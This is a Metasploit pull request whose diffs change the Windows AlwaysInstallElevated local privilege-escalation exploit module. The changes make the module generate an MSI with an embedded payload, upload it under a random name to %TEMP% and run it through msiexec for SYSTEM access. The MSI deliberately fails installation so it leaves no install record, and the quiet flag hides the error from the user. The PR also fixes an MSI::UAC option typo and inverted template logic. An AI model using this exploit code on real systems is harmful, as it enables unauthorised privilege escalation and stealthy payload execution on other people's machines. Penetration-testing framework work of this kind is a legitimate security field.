### PR TITLE
Update AlwaysInstallElevated to use a generated MSI file

### DIFF
--- a/lib/msf/core/exploit/exe.rb
+++ b/lib/msf/core/exploit/exe.rb
@@ -112,7 +112,7 @@ module Exploit::EXE
     opts.merge! ({
         :msi_template => datastore['MSI::Template'],
         :msi_template_path => datastore['MSI::Path'],
-        :uac => datastore['MSI:UAC']
+        :uac => datastore['MSI::UAC']
     })
 
     msi = Msf::Util::EXE.to_exe_msi(framework, exe, opts)

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -495,9 +495,9 @@ require 'msf/core/exe/segment_injector'
   #
   def self.to_exe_msi(framework, exe, opts={})
     if opts[:uac]
-      opts[:msi_template] ||= "template_nouac_windows.msi"
-    else
       opts[:msi_template] ||= "template_windows.msi"
+    else
+      opts[:msi_template] ||= "template_nouac_windows.msi"
     end
     return replace_msi_buffer(exe, opts)
   end

--- a/modules/exploits/windows/local/always_install_elevated.rb
+++ b/modules/exploits/windows/local/always_install_elevated.rb
@@ -9,12 +9,13 @@ require 'msf/core'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
-  Rank = AverageRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
   include Msf::Post::File
   include Msf::Post::Windows::Registry
-  include Msf::Exploit::FileDropper
+
 
   def initialize(info={})
     super(update_info(info, {
@@ -22,22 +23,11 @@ class Metasploit3 < Msf::Exploit::Local
       'Description'    => %q{
           This module checks the AlwaysInstallElevated registry keys which dictate if
         .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
-
-        The default MSI file is data/exploits/exec_payload.msi with the WiX source file
-        under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply
-        executes payload.exe within the same folder.
-
-        The MSI may not execute succesfully successive times, but may be able to get around
-        this by regenerating the MSI.
-
-        MSI can be rebuilt from the source using the WIX tool with the following commands:
-        candle exec_payload.wxs
-        light exec_payload.wixobj
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
-          'Ben Campbell',
+          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
           'Parvez Anwar' # discovery?/inspiration
         ],
       'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
@@ -46,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Local
       'DefaultOptions' =>
         {
           'WfsDelay' => 10,
-          'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -k -f'
+          'EXITFUNC' => 'process',
+          'MSI::UAC' => true
         },
       'Targets'       =>
         [
@@ -57,7 +47,8 @@ class Metasploit3 < Msf::Exploit::Local
         [
           [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
           [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
-          [ 'URL', 'http://wix.sourceforge.net'] ,
+          [ 'URL', 'http://wix.sourceforge.net'],
+          [ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html']
         ],
       'DisclosureDate'=> 'Mar 18 2010',
       'DefaultTarget' => 0
@@ -106,24 +97,15 @@ class Metasploit3 < Msf::Exploit::Local
       return
     end
 
-    msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
-    msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
+    msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
+    msi_source = generate_payload_msi
 
     # Upload MSI
-    @msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
-    print_status("Uploading the MSI to #{@msi_destination} ...")
+    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
+    print_status("Uploading the MSI to #{msi_destination} ...")
 
-    #upload_file - ::File.read doesn't appear to work in windows...
-    source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
-    write_file(@msi_destination, source)
-    register_file_for_cleanup(@msi_destination)
-
-    # Upload payload
-    payload = generate_payload_exe
-    @payload_destination = expand_path("%TEMP%\\payload.exe").strip
-    print_status("Uploading the Payload to #{@payload_destination} ...")
-    write_file(@payload_destination, payload)
-    register_file_for_cleanup(@payload_destination)
+    write_file(msi_destination, msi_source)
+    register_file_for_cleanup(msi_destination)
 
     # Execute MSI
     print_status("Executing MSI...")
@@ -140,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Local
       quiet = ""
     end
 
-    cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
+    cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}"
     vprint_status("Executing: #{cmd}")
     begin
       result = cmd_exec(cmd)

--- a/modules/exploits/windows/local/always_install_elevated.rb
+++ b/modules/exploits/windows/local/always_install_elevated.rb
@@ -21,8 +21,12 @@ class Metasploit3 < Msf::Exploit::Local
     super(update_info(info, {
       'Name'          => 'Windows AlwaysInstallElevated MSI',
       'Description'    => %q{
-          This module checks the AlwaysInstallElevated registry keys which dictate if
+          This module checks the AlwaysInstallElevated registry keys which dictates if
         .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
+        The generated .MSI file has an embedded executable which is extracted and run
+        by the installer. After execution the .MSI file intentionally fails installation
+        (by calling some invalid VBS) to prevent it being registered on the system.
+        By running this with the /quiet argument the error will not be seen by the user.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
@@ -47,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Local
         [
           [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
           [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
-          [ 'URL', 'http://wix.sourceforge.net'],
           [ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html']
         ],
       'DisclosureDate'=> 'Mar 18 2010',
@@ -93,22 +96,17 @@ class Metasploit3 < Msf::Exploit::Local
 
   def exploit
 
-    if check != Msf::Exploit::CheckCode::Vulnerable
-      return
-    end
+    return unless check == Msf::Exploit::CheckCode::Vulnerable
 
     msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
     msi_source = generate_payload_msi
 
     # Upload MSI
-    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
+    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip
     print_status("Uploading the MSI to #{msi_destination} ...")
 
     write_file(msi_destination, msi_source)
     register_file_for_cleanup(msi_destination)
-
-    # Execute MSI
-    print_status("Executing MSI...")
 
     if datastore['LOG_FILE'].nil?
       logging = ""
@@ -123,6 +121,8 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}"
+
+    print_status("Executing MSI...")
     vprint_status("Executing: #{cmd}")
     begin
       result = cmd_exec(cmd)


### PR DESCRIPTION
Also fixes bugs with MSI::UAC option, invalid logic and typo...

MSI also fails installation to allow multiple exploits (we have a static GUID for our installer).

Don't need to migrate as we don't have to cleanup a payload.exe file anymore. 
